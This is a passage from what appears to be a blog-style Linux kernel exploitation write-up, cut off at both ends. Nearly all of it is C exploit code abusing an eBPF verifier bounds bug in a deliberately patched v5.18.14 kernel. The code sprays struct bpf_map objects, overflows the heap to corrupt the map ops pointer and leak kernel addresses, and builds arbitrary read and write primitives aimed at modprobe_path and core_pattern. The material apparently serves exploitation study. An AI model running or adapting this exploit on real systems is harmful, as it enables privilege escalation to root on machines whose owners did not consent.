      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // This call sets the min and max of r1 to the known immediate.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).

      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),           // r1(w1) = w1(r1)
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),           // r0 = r6
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),  // r0 += r1
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0,
                  -0x10),  // *(u64*)(fp-0x10) = r0
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),     // *(u64*)(fp-0x08) = 0
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),      // arg2 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),  // arg2 = arg2(fp)-0x08
      // arg3(&amp;amp;val) = fp-0x10
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10),  // arg3 = arg3(fp)-0x10
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),  // arg4 = 0
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  write(socks[1], &amp;#34;Hello&amp;#34;, 5);

  bpf_map_lookup(mapfd, 0, &amp;amp;val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return val - 1 - 0x110;
}

uint64_t bpf_map_addr = 0;

int main() {
  srand(time(NULL));
  char verifier_log[0x10000];

  mapfd = bpf_map_create(sizeof(uint64_t), 1);

  bpf_map_addr = leak_bpf_map_addr();
  printf(&amp;#34;[+] bpf_map_addr: 0x%016lx, &amp;amp;bpf_map_elem = 0x%016lx\n&amp;#34;, bpf_map_addr,
         bpf_map_addr + 0x110);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h4 id=&#34;leak-addr-of-struct-bpf_map-using-oob-read--heap-spray&#34;&gt;Leak addr of &lt;code&gt;struct bpf_map&lt;/code&gt; using oob read &amp;amp; heap spray&lt;/h4&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;376148295&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;376148295&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;leak_bpf_map_using_oob_read.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handle the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define BPF_MAP_OPS_LOOKUP_IDX 12
#define BPF_MAP_OPS_LOOKUP_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_LOOKUP_IDX * 8)
#define BPF_MAP_OPS_UPDATE_ELEM_IDX 13
#define BPF_MAP_OPS_UPDATE_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_UPDATE_ELEM_IDX * 8)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd;
int map_spray_fd[0x100];
void make_corrupted_map() {
  uint64_t map_val = 1;

  puts(&amp;#34;[*] Spray struct bpf_map...&amp;#34;);
  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; i++) {
    map_spray_fd[i] = bpf_map_create(sizeof(uint64_t), 1);
    bpf_map_update(map_spray_fd[i], 0, &amp;amp;map_val);
  }
  mapfd = map_spray_fd[0x81];

  char verifier_log[0x10000];

  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = map_elem
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_6),  // arg3 = r6 == map_elem
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    0xf1 - 1),  // arg4 = (0xf1-1) * arg4 == (actual_val=0xf1-1;
                                // val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0xf1; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, map_elem, (actual_val=0xf1; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // overflows heap past map_elem

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  char buf[0x100] = {
      0,
  };
  // Overwrite low byte of bpf_map-&amp;gt;ops
  // (https://elixir.bootlin.com/linux/v5.18.14/source/include/linux/bpf.h#L63)
  memset(buf, &amp;#39;a&amp;#39;, 0xf0);
  buf[0xf0] = 0xa0 - 8;
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);
}

int corrupted_map_fd;
uint64_t bpf_map_addr;
void find_corrupted_map_and_leak_bpf_map_addr() {
  char verifier_log[0x10000];

  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; ++i) {
    int cur_map_fd = map_spray_fd[i];
    if (cur_map_fd == mapfd) {
      continue;
    }

    // uint64_t map_val = 0;
    // int ret = bpf_map_update(cur_map_fd, 0, &amp;amp;map_val);
    // printf(&amp;#34;ret: 0x%x, val: 0x%lx\n&amp;#34;, ret, map_val);

    struct bpf_insn insns[] = {
        // BPF_REG_ARG1 == struct __sk_buff
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                    -0x08),  // *(u64*)(fp-0x08) = skb

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, cur_map_fd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x10 &amp;lt;- 0
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_ARG2),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x10, 0) or map_lookup_elem(mapfd,
        // fp-0x10) if corrupted
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x18),

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x18 &amp;lt;- return value of map_update_elem or
        // map_lookup_elem.
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x18),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x18, 0)
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),
    };

    union bpf_attr prog_attr = {
        .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
        .insn_cnt = sizeof(insns) / sizeof(insns[0]),
        .insns = (uint64_t)insns,
        .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
        .log_level = 2,
        .log_size = sizeof(verifier_log),
        .log_buf = (uint64_t)verifier_log,
    };

    int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
    if (progfd &amp;lt; 0) {
      puts(&amp;#34;============[failed reason]============&amp;#34;);
      printf(&amp;#34;%s\n&amp;#34;, verifier_log);
      fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
    }

    int socks[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
      fatal(&amp;#34;socketpair&amp;#34;);
    }
    if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
      fatal(&amp;#34;setsockopt&amp;#34;);
    }

    write(socks[1], &amp;#34;Hello&amp;#34;, 5);

    uint64_t val;
    bpf_map_lookup(mapfd, 0, &amp;amp;val);

    close(socks[0]);
    close(socks[1]);
    close(progfd);

    if (val != 0) {
      bpf_map_addr = val - 0x110;
      corrupted_map_fd = cur_map_fd;
      continue;
    }

    close(cur_map_fd);
  }
}

uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = r6 == map_elem (verifier sees a
                           // map_value ptr; overwritten with addr at runtime)
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&amp;amp;val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
